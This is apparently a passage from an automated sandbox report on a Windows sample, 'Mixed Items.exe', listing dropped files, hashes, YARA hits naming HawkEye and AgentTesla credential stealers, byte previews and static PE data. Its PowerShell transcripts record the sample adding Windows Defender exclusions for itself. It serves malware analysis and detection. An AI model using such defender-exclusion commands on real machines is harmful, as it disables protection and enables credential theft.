                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zux455h.wha.ps1
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3qm3trx.u2l.psm1
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mh5wpd4r.xxq.ps1
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyhy1zxg.gf4.psm1
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):532992
                                                                                                    Entropy (8bit):6.507156751280516
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:DufqM5JXbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9E:uJXQtqB5urTIoYWBQk1E+VF9mOx9Ei
                                                                                                    MD5:FFDB58533D5D1362E896E96FB6F02A95
                                                                                                    SHA1:D6E4A3CA253BFC372A9A3180B5887C716ED285C6
                                                                                                    SHA-256:B3D02FD5C69293DB419AC03CDF6396BD5E7765682FB3B2390454D9A52BA2CA88
                                                                                                    SHA-512:3AE6E49D3D728531201453A0BC27436B1A4305C8EF938B2CBB5E34EE45BB9A9A88CF2A41B08E4914FDA9A96BBAA48BD999A2D2F1DFFCD39761BB1F3620CA725F
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Arnim Rupp
                                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: JPCERT/CC Incident Response Group
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 96%
                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................4........... ........@.. ....................................@.....................................O.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`....... ..............@..B........................H.......0}..\..............X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                                                    C:\Users\user\AppData\Local\Temp\origigoods20.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):220672
                                                                                                    Entropy (8bit):6.057903449485828
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:SVQEat7UY8MnZGcqB5AyruUJ7XAzsNvEaEifv6yr9zRsc0qC4B0BUAE3vVAVvoUB:SytJqCUyQNX36yQqbB063cAUAW
                                                                                                    MD5:61DC57C6575E1F3F2AE14C1B332AD2FB
                                                                                                    SHA1:F52F34623048E5FD720E97A72EEDFD32358CD3A9
                                                                                                    SHA-256:1C7757EE223F2480FBC478AE2ECAF82E1D3C17F2E4D47581D3972416166C54AB
                                                                                                    SHA-512:81A7DB927F53660D3A04A161D5C18AAB17D676BCC7AE0738AB786D9BEE82B91016E54E6F70428AEC4087961744BE89B1511F9E07D8DABBE5C2A9D836722395A1
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: Metadefender, Detection: 43%, Browse
                                                                                                    • Antivirus: ReversingLabs, Detection: 93%
                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.................V...........t... ........@.. ....................................@..................................t..O.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................t......H.........................................................................(....*..(....*.s.........s.........s.........s.........*...0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0............+......,........,........,.+.+...(....(....*...0..(.........+......,........,........,.+.+..(....*.0..,.......
                                                                                                    C:\Users\user\AppData\Local\Temp\origigoods40.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):221696
                                                                                                    Entropy (8bit):6.060343577776758
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:K9Wf3ouEAkhUxOCt+qqr3drw0tR5dUimnoSA7Mw4lY2hWYQQgGJrozRscS4+SOw6:KhuI3dlxUOt7IdWLOjCDUjU
                                                                                                    MD5:AE36F0D16230B9F41FFECBD3C5B1D660
                                                                                                    SHA1:88AFC2923D1EEFB70BAD3C0CD9304949954377EF
                                                                                                    SHA-256:CFAD1E486666FF3FB042BA0E9967634DE1065F1BBD505C61B3295E55705A2A50
                                                                                                    SHA-512:1E98AEE7DC693822113DCDE1446A5BED1C564B76EEF39F39F3A5D98D7D2099CF69AC92717A3297AFC7082203929F1E9437F21CB6BC690974A0EF6D6CF6E4393C
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: Metadefender, Detection: 43%, Browse
                                                                                                    • Antivirus: ReversingLabs, Detection: 86%
                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................X..........>v... ........@.. ....................................@..................................u..S.......P............................................................................ ............... ..H............text...DV... ...X.................. ..`.rsrc...P............Z..............@..@.reloc...............`..............@..B................ v......H...........H.............................................................(....*..(....*.s.........s.........s.........s.........*...0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0............+......,........,........,.+.+...(....(....*...0..(.........+......,........,........,.+.+..(....*.0..,.......
                                                                                                    C:\Users\user\AppData\Local\WindowsAPI\Mixed_Items.exe_Url_4vyxcvojequ3efv0ai33sezp4mazprqx\4.152.723.137\yowqlu0x.newcfg
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8040704
                                                                                                    Entropy (8bit):3.1191276452386894
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:XPtD9fJHnfa0MFig4loNDgfzdUqXYJcenH8CqfykSW7CE9ZCW/V2P/MmEizNCmBi:lvbCRBKLMQtmumls0Mam
                                                                                                    MD5:C4193405C45F878C5E02FA4B263142B8
                                                                                                    SHA1:AA5E3BD8F59352C154860A9B79C3FD11FB01D10B
                                                                                                    SHA-256:281FB62B35A26DB9FF27EF2E651B4E854529EAD0B5853701F96C031AFE69E290
                                                                                                    SHA-512:95BAECF64742AABCF65B161167AB6FA7F09EFB8468A1F4691A4345D333E62D41246541AB156C15E3B5C715568AAECD474E0D478BCD6AB01E30F02096163D6940
                                                                                                    Malicious:false
                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="HhWacKtFzfukChDVbubfTrZrVbAtaVyzZbNqyntLmrIPObE.CSjJWBiTlySaukEqHedjDjyioksOeIaFe" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <HhWacKtFzfukChDVbubfTrZrVbAtaVyzZbNqyntLmrIPObE.CSjJWBiTlySaukEqHedjDjyioksOeIaFe>.. <setting name="RFMEHwInzsKqSMaWl" serializeAs="String">.. <value>77V90V144V0V3V0V0V0V4V0V0V0V255V255V0V0V184V0V0V0V0V0V0V0V64V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V128V0V0V0V14V31V186V14V0V180V9V205V33V184V1V76V205V33V84V104V105V1
                                                                                                    C:\Users\user\AppData\Roaming\pid.txt
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):2.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Pm:e
                                                                                                    MD5:C0826819636026DD1F3674774F06C51D
                                                                                                    SHA1:1E768A21723E530122240FA219BFF8C3365F40B2
                                                                                                    SHA-256:01B23136EA7F9F8B9E72C9E125FD710301BAEC28662B0DE2168967838C79E81A
                                                                                                    SHA-512:8AF15968CE7287442204A26F411FF8C3AA6F43167D39A2719DF5C4540B3174D41A6C8063DB82EB49433805CD52F5BC1388BBD032C2C35260E05868C1BBA68E27
                                                                                                    Malicious:false
                                                                                                    Preview: 1392
                                                                                                    C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):47
                                                                                                    Entropy (8bit):4.376204213693507
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:oNWXp5cViE2J5xAI4F:oNWXp+N23f8
                                                                                                    MD5:EE8C153C2C2A0850DEE1BE69D03BB011
                                                                                                    SHA1:2F2FBC7ABB2EEE1DF6198FF180860516D983905A
                                                                                                    SHA-256:15B7AAE18CB550E8A7B4210496289D53D84CF86ECDC4C175BBFEB789B08FC488
                                                                                                    SHA-512:CF9F63528B0D50FA85EF6E2A0364178DF20A60557038A76E32C348196B969566D5071BD272534EAC2DCA5197947FFB5A4DCD723FC8135FDB81372E657DF7A2D8
                                                                                                    Malicious:false
                                                                                                    Preview: C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                    C:\Users\user\Documents\20210305\PowerShell_transcript.506013.0nP0+V72.20210305142754.txt
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):846
                                                                                                    Entropy (8bit):5.310409359628285
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:BxSA0xvBnbx2DOXUWeSuqpWeHjeTKKjX4CIym1ZJXuuqh:BZIvhboO+Sp4eqDYB1ZUph
                                                                                                    MD5:F69879D2324FA8DDEF956B398557F5E4
                                                                                                    SHA1:CF90260BB7E81F4B58E1EB0CDF7E4F7F2B315668
                                                                                                    SHA-256:7C8D023C9F24F0AE23102B889B376FE9EE573A51E35EDE3592D61D0A32801C96
                                                                                                    SHA-512:70DB8EC1AECA708B301E0C83E75BAFE8D2BA2DE6EEE26740041480763E9358EE754DD4CEE3D1DCC6EA6CBA75C35FD5C673833377C802F16EC0160B2DFC7A8037
                                                                                                    Malicious:false
                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210305142826..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 506013 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Mixed Items.exe -Force..Process ID: 2152..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210305142826..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Mixed Items.exe -Force..
                                                                                                    C:\Users\user\Documents\20210305\PowerShell_transcript.506013.RPfp4n8i.20210305142756.txt
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):916
                                                                                                    Entropy (8bit):5.4360707335352405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:BxSAAxvBnbx2DOXUWeSuAjWoHjeTKKjX4CIym1ZJXCuAL:BZEvhboO+SVqoqDYB1ZcVL
                                                                                                    MD5:55B592D61FB7A30573C912A818C91951
                                                                                                    SHA1:9E62843D1F6A90DD6C9D5B7156F2E236AA6FC832
                                                                                                    SHA-256:2ADC8A9B9CCF3E327E228C7C2105F44FA93C0C25122BCCA07B26DE634E53DC1C
                                                                                                    SHA-512:B41D518369BCB24E2553B2728CF8B7BA56FE454F3913C6039C4632CDF9F06ABCA4F079F6F8EA7E5B7EAEC484EDD26D25F1AF4D46A5701D1F1B9D11C38A15CB36
                                                                                                    Malicious:false
                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210305142831..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 506013 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe -Force..Process ID: 4116..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210305142831..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe -Force..
                                                                                                    C:\Users\user\Documents\20210305\PowerShell_transcript.506013.YRcDMrIT.20210305142756.txt
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):846
                                                                                                    Entropy (8bit):5.3022844597421495
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:BxSAAxvBnbx2DOXUWeSuqpW5HjeTKKjX4CIym1ZJXCuqh:BZEvhboO+Sp45qDYB1Zcph
                                                                                                    MD5:BD2110BFCB03716BF8B4DD1A9B4FA1EC
                                                                                                    SHA1:C8752AAC9BE7358714B07FAE68972054E6B0C9C4
                                                                                                    SHA-256:714D9629E7B36AA452AE2B4DB202431320629E0BB1702116DB739D219BA91155
                                                                                                    SHA-512:1F50DA1C70F1465FD1A5BA4BE7663C55FD5B7D10C18CBB7F1721D72C93B2C5CDD5897B76067EE1867D580E3FF186DC72D087D1E3CD24F1C0BFFE9D1457353A28
                                                                                                    Malicious:false
                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210305142831..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 506013 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Mixed Items.exe -Force..Process ID: 6300..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210305142831..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Mixed Items.exe -Force..
                                                                                                    C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86808
                                                                                                    Entropy (8bit):5.248273656007456
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:FjWGjHoODdPfUwUmsA4de1IeT0EtRwwwqe+Sk5XTsLhD:bjN5UwDsteT0wsJ
                                                                                                    MD5:017E52146C9131DBC9487D834CDFC247
                                                                                                    SHA1:6DFF831A7FD2A42EC3ABE4C1BA51F3A9C9C6A25B
                                                                                                    SHA-256:26C230CDE9FB7544F7E3762F1ABAC39F6C8F0D2DB0689178B223E0E68D2A6A0A
                                                                                                    SHA-512:0BB939ADF020A01DB26B057ADEAD21EC5A6A6FA3A081B6466BA6FC5B661D1EBEA507E17A14588FDDFEB85536674382A8CD77057F569E0EB9278C9C403D97177D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.y..........."...0..2...........Q... ...`....@.. ..............................W.....@.................................dQ..W....`...............>............................................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............<..............@..B.................Q......H.......<+..(&...........................................................*F.(........(.....*".(.....*>..r}..p.o4....*".(5....*Vs....(6...t.........*F.(........(.....*.rL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pz*.rL..pzrL..pzrL..pzrL..pzrL..pzrL..pz*.rL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pz*.rL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pz*.rL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pz*~rL..pzrL..pzrL..pzrL..pzrL..pz*.0..........rL..pzrL..pzrL..pzrL
                                                                                                    C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe:Zone.Identifier
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:true
                                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55
                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                    Malicious:false
                                                                                                    Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):5.248273656007456
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                    File name:Mixed Items.exe
                                                                                                    File size:86808
                                                                                                    MD5:017e52146c9131dbc9487d834cdfc247
                                                                                                    SHA1:6dff831a7fd2a42ec3abe4c1ba51f3a9c9c6a25b
                                                                                                    SHA256:26c230cde9fb7544f7e3762f1abac39f6c8f0d2db0689178b223e0e68d2a6a0a
                                                                                                    SHA512:0bb939adf020a01db26b057adead21ec5a6a6fa3a081b6466ba6fc5b661d1ebea507e17a14588fddfeb85536674382a8cd77057f569e0eb9278c9c403d97177d
                                                                                                    SSDEEP:768:FjWGjHoODdPfUwUmsA4de1IeT0EtRwwwqe+Sk5XTsLhD:bjN5UwDsteT0wsJ
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.y..........."...0..2...........Q... ...`....@.. ..............................W.....@................................

                                                                                                    File Icon

                                                                                                    Icon Hash:00828e8e8686b000

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x4151be
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:true
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                    Time Stamp:0xEA799C72 [Sat Aug 28 12:54:10 2094 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:v4.0.30319
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                    Authenticode Signature

                                                                                                    Signature Valid:false
                                                                                                    Signature Issuer:C=CxIXTKwSoMCLxPuWHhugs, S=lgYPTXZnvpiTkGdjupDgPoRlmhzkTzHbzenLEGqYPHbubwMQ, L=CwjVPVwJkqWwFGdmwR, T=RyzWKLBwDeWQzCUxqptR, E=zXPiPGIuTRAxwAsULVOVRHusYTQNXjGkAaVL, OU=iIVbAskroXcHwzniFtPapLluJGHoDsfundBtrSwFtel, O=muVoRorsGTceSKbnTWYDwAiBFlHcPnOIRP, CN=gvZGrBSrlMevBvcRpsHBJVQfMpkpvyqNEL
                                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                    Error Number:-2146762487
                                                                                                    Not Before, Not After
                                                                                                    • 3/4/2021 4:46:19 PM 3/4/2022 4:46:19 PM
                                                                                                    Subject Chain
                                                                                                    • C=CxIXTKwSoMCLxPuWHhugs, S=lgYPTXZnvpiTkGdjupDgPoRlmhzkTzHbzenLEGqYPHbubwMQ, L=CwjVPVwJkqWwFGdmwR, T=RyzWKLBwDeWQzCUxqptR, E=zXPiPGIuTRAxwAsULVOVRHusYTQNXjGkAaVL, OU=iIVbAskroXcHwzniFtPapLluJGHoDsfundBtrSwFtel, O=muVoRorsGTceSKbnTWYDwAiBFlHcPnOIRP, CN=gvZGrBSrlMevBvcRpsHBJVQfMpkpvyqNEL
                                                                                                    Version:3
                                                                                                    Thumbprint MD5:9D1E87B33DFAD65CD7994E81536FE81B
                                                                                                    Thumbprint SHA-1:9121B22BFA1E034D66ECBBEF0A16A7F99FF1ED71
                                                                                                    Thumbprint SHA-256:B6ED10F00D23B1B6587357AD36112AE283853F098AB3557F1B7B358F01F105DB
                                                                                                    Serial:00FD586FE6F8FB5F9B46153E047AAE8BBA

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
